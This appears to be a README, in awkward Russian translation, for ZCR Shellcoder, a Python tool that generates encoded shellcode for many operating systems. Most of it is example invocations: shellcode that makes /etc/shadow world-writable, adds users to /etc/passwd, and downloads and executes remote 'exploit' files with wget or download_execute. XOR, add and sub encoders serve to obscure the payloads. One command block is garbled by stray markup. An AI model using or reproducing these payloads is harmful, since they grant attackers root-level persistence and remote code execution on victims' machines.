# ZCR Shellcoder

Писатель: Али Размджу Переводчик: Шива Размджу

ZeroDay Cyber Research Shellcoder (генератор), это открытый источник на языке "python" с помощью которого Вам возможно рождать изготовленные shellcodes Вами для операции списочных системов. Это програмное обеспечение может быть выполняться на Windows/Linux&Unix/OSX и других OS, использованием этого языка python 2.7.х.

# Как это работает?

Для показания перечни (switches), вы должны выполнять програмное обеспечение в формате "-h" or "-help" or "--help" рекомендаций.

```
ZeroDay Cyber Research Shellcoder

Switches:
-h, --h, -help, --help => to see this help guide
-os => choose your os to create shellcode
-oslist => list os for switch -os
-o => output filename
-job => what shellcode gonna do for you ?
-joblist => list of -job switch
-encode => generate shellcode with encode
-types => types of encode for -encode switch
-update => check for update

Author Website: http://z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/p/zcr-shellcoder.html
Ali@Z3r0D4y.Com
key: ASIIN_BLUE_RUBY | version: 1.0.0 | Release Date: 2015 May 22
```

-os switch разрешает Вам выъирать свой получатель оперативного система. Вы можете видеть перечень os, которая поддержается -oslist switch.

```
[+] linux_x86
[+] linux_x64
[+] linux_arm
[+] linux_mips
[+] freebsd_x86
[+] freebsd_x64
[+] windows_x86
[+] windows_x64
[+] windows_x64
[+] osx
[+] solaris_x86
[+] solaris_x64

Author Website: http://z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/p/zcr-shellcoder.html
Ali@Z3r0D4y.Com
key: ASIIN_BLUE_RUBY | version: 1.0.0 | Release Date: 2015 May 22
```

- -o switch, это выводимая имя файла, которая рождается в выводимой файле.
- -job switch используется для выбирания функции на рождение shellcode. Вы можете видеть перечень функции с -joblist switch.

```
[+] exec('/path/file')
[+] chmod('/path/file','permission number')
[+] write('/path/file','text to write')
[+] file_create('/path/file','text to write')
[+] dir_create('/path/folder')
[+] download('url','filename')
[+] download_execute('url','filename','command to execute')
[+] system('command to execute')
[+] script_executor('name of script','path and name of your script in your pc','execute command')

Author Website: http://z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/p/zcr-shellcoder.html
Ali@Z3r0D4y.Com
key: ASIIN_BLUE_RUBY | version: 1.0.0 | Release Date: 2015 May 22
```

-encode switch используйте на выбирание свой shellcode encode type, чтоб выдели перечень, тогда выполните -types switch.

```
[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc_timesyouwant
[+] inc_timesyouwant
[+] dec
[+] inc_timesyouwant
[+] dec
[+] dec_timesyouwant
[+] mix_all

Author Website: http://z3r0d4y.com/
Project URL: http://www.z3r0d4y.com/p/zcr-shellcoder.html
Ali@Z3r0D4y.Com
key: ASIIN_BLUE_RUBY | version: 1.0.0 | Release Date: 2015 May 22
```

-update (дополнение) switch для начала дополнения програмного обеспечения. Также увидите архив вариантов вот тут:

https://github.com/Ali-Razmjoo/ZCR-Shellcoder-Archive

И последнее дополнение доступно:

https://github.com/Ali-Razmjoo/ZCR-Shellcoder

и: http://www.z3r0d4y.com/p/zcr-shellcoder.html

# Доступные признаки

# Образец исполнительных рекомендаций:

#### Windows cmd:

python shellcoder.py -os linux\_x86 -job chmod('/etc/shadow','777') -encode none -o shellcode.asm

python shellcoder.py -os linux\_x86 -job write('/etc/passwd','Ali......[add user]') -encode none -o shellcode.asm

python shellcoder.py -os linux\_x86 -job exec('/usr/bin/python') -encode none -o shellcode.asm

#### system()

python shellcoder.py -os linux\_x86 -job system('chmod[space]777[space]/etc/shadow') - encode none -o shellcode.asm

#### multi command execution

python shellcoder.py -os linux\_x86 -job
system('chmod[space]777[space]/etc/shadow;wget[space]exploit[space];chmod[space]+x[s
pace]exploit[space];./exploit;echo[space]user:pass[space]>>[space]/etc/passwd') -encode
none -o shellcode.asm

```
python shellcoder.py -os linux_x86 -encode none -job file_create('/root/Desktop/hello.txt','hello') -o file.txt python shellcoder.py -os linux_x86 -encode none -job file_create('/root/Desktop/hello2.txt','hello[space]world[space]!') -o file.txt python shellcoder.py -os linux_x86 -encode none -job dir_create('/root/Desktop/mydirectory') -o file.txt
```

python shellcoder.py -os linux\_x86 -encode none -job download('http://www.z3rOd4y.com/exploit.type', 'myfile.type') -o file.txt

```
python shellcoder.py -os linux_x86 -encode none -job
download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','./myfile.type') -o
file.txt
python shellcoder.py -os linux_x86 -encode none -job
download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','chmod[space]77
7[space]myfile.type;sh[space]myfile.type') -o file.txt
python shellcoder.py -os linux_x86 -encode none -job
script_executor('script.type','D:\\myfile.type','./script.type') -o file.txt
python shellcoder.py -os linux_x86 -encode none -job
script_executor('z3r0d4y.sh','/root/z3r0d4y.sh','sh[space]z3r0d4y.sh') -o file.txt
python shellcoder.py -os linux_x86 -encode none -job
script_executor('ali.py','/root/Desktop/Oday.py','chmod[space]+x[space]ali.py;[space]pyt
hon[space]ali.py') -o file.txt
python shellcoder.py -os linux_x86 -encode xor_random -job chmod('/etc/shadow','777')
-o file.txt
python shellcoder.py -os linux_x86 -encode xor_random -job chmod('/etc/passwd','444')
-o file.txt
python shellcoder.py -os linux_x86 -encode xor_0x41414141 -job
chmod('/etc/shadow','777') -o file.txt
python shellcoder.py -os linux_x86 -encode xor_0x45872f4d -job
chmod('/etc/passwd','444') -o file.txt
python shellcoder.py -os linux_x86 -encode add_random -job chmod('/etc/passwd','444')
-o file.txt
python shellcoder.py -os linux_x86 -encode add_0x41414141 -job
chmod('/etc/passwd','777') -o file.txt
python shellcoder.py -os linux_x86 -encode sub_random -job chmod('/etc/passwd','777')
-o file.txt
python shellcoder.py -os linux_x86 -encode sub_0x41414141 -job
chmod('/etc/passwd','444') -o file.txt
```

**ZCR** 

#### Linux and OSX Terminal:

you need to put a "\" behind the "(" and "'" char in your switch.

python shellcoder.py -os linux\_x86 -job chmod\(\'/etc/shadow\', \'777\'\) -encode none -o shellcode.asm

python shellcoder.py -os linux\_x86 -job write\(\'/etc/passwd\', \'Ali.......[add user] \'\) - encode none -o shellcode.asm

python shellcoder.py -os linux\_x86 -job exec\(\'/usr/bin/python\'\) -encode none -o shellcode.asm

### system()

python shellcoder.py -os linux\_x86 -job
system\(\'chmod[space]777[space]/etc/shadow\'\) -encode none -o shellcode.asm

## multi command execution

```
\label{looder.py-os-linux_x86-job} $$ system (\'chmod[space]777[space]/etc/shadow; wget[space]exploit[space]; chmod[space]+ x[space]exploit[space];./exploit; echo[space]user:pass[space]>>[space]/etc/passwd\'\) - encode none -o shellcode.asm
```

```
python shellcoder.py -os linux_x86 -encode none -job
file_create\(\'/root/Desktop/hello.txt\',\'hello\'\) -o file.txt
```

python shellcoder.py -os linux\_x86 -encode none -job file\_create\(\'/root/Desktop/hello2.txt\',\'hello[space]world[space]!\'\) -o file.txt

python shellcoder.py -os linux\_x86 -encode none -job dir\_create\(\'/root/Desktop/mydirectory\'\) -o file.txt

python shellcoder.py -os linux\_x86 -encode none -job download\(\'http://www.z3r0d4y.com/exploit.type\',\'myfile.type\'\) -o file.txt

```
python shellcoder.py -os linux_x86 -encode none -job
download_execute\(\'http://www.z3r0d4y.com/exploit.type\',\'myfile.type\',\'./myfile.t
ype\'\) -o file.txt
python shellcoder.py -os linux_x86 -encode none -job
download_execute\(\'http://www.z3r0d4y.com/exploit.type\',\'myfile.type\',\'chmod[sp
ace]777[space]myfile.type;sh[space]myfile.type\'\) -o file.txt
python shellcoder.py -os linux_x86 -encode none -job
script_executor\(\'script.type\',\'D:\\myfile.type\',\'./script.type\'\) -o file.txt
python shellcoder.py -os linux_x86 -encode none -job
script\_executor\(\'z3r0d4y.sh\',\'/root/z3r0d4y.sh\',\'sh[space]z3r0d4y.sh\'\) -o
file.txt
python shellcoder.py -os linux_x86 -encode none -job
script_executor\(\'ali.py\',\'/root/Desktop/Oday.py\',\'chmod[space]+x[space]ali.py;[spa
ce]python[space]ali.py\'\) -o file.txt
python shellcoder.py -os linux_x86 -encode xor_random -job
chmod\(\'/etc/shadow\',\'777\'\) -o file.txt
python shellcoder.py -os linux_x86 -encode xor_random -job
chmod\(\'/etc/passwd\',\'444\'\) -o file.txt
python shellcoder.py -os linux_x86 -encode xor_0x41414141 -job
chmod\(\'/etc/shadow\',\'777\'\) -o file.txt
python shellcoder.py -os linux_x86 -encode xor_0x45872f4d -job
chmod\(\'/etc/passwd\',\'444\'\) -o file.txt
python shellcoder.py -os linux_x86 -encode add_random -job
chmod\(\'/etc/passwd\',\'444\'\) -o file.txt
python shellcoder.py -os linux_x86 -encode add_0x41414141 -job
chmod\(\'/etc/passwd\',\'777\'\) -o file.txt
python shellcoder.py -os linux_x86 -encode sub_random -job
chmod\(\'/etc/passwd\',\'777\'\) -o file.txt
```

python shellcoder.py -os linux\_x86 -encode  $sub_0x41414141$  -job chmod\(\'/etc/passwd\',\'444\'\) -o file.txt

Для получения более информации и анализирования программного обеспечения и рекомендаций, посетите: <u>z3r0d4y.com</u>.

# Ссылки:

ZeroDay Cyber Research z3r0d4y.com

Home: http://www.z3r0d4y.com/p/zcr-shellcoder.html

Analysis post: http://www.z3r0d4y.com/2015/05/zcr-shellcoder-review-and-

analysis\_20.html

 $Github: \underline{https://github.com/Ali-Razmjoo/ZCR-Shellcoder}$ 

Archive: <a href="https://github.com/Ali-Razmjoo/ZCR-Shellcoder-Archive">https://github.com/Ali-Razmjoo/ZCR-Shellcoder-Archive</a>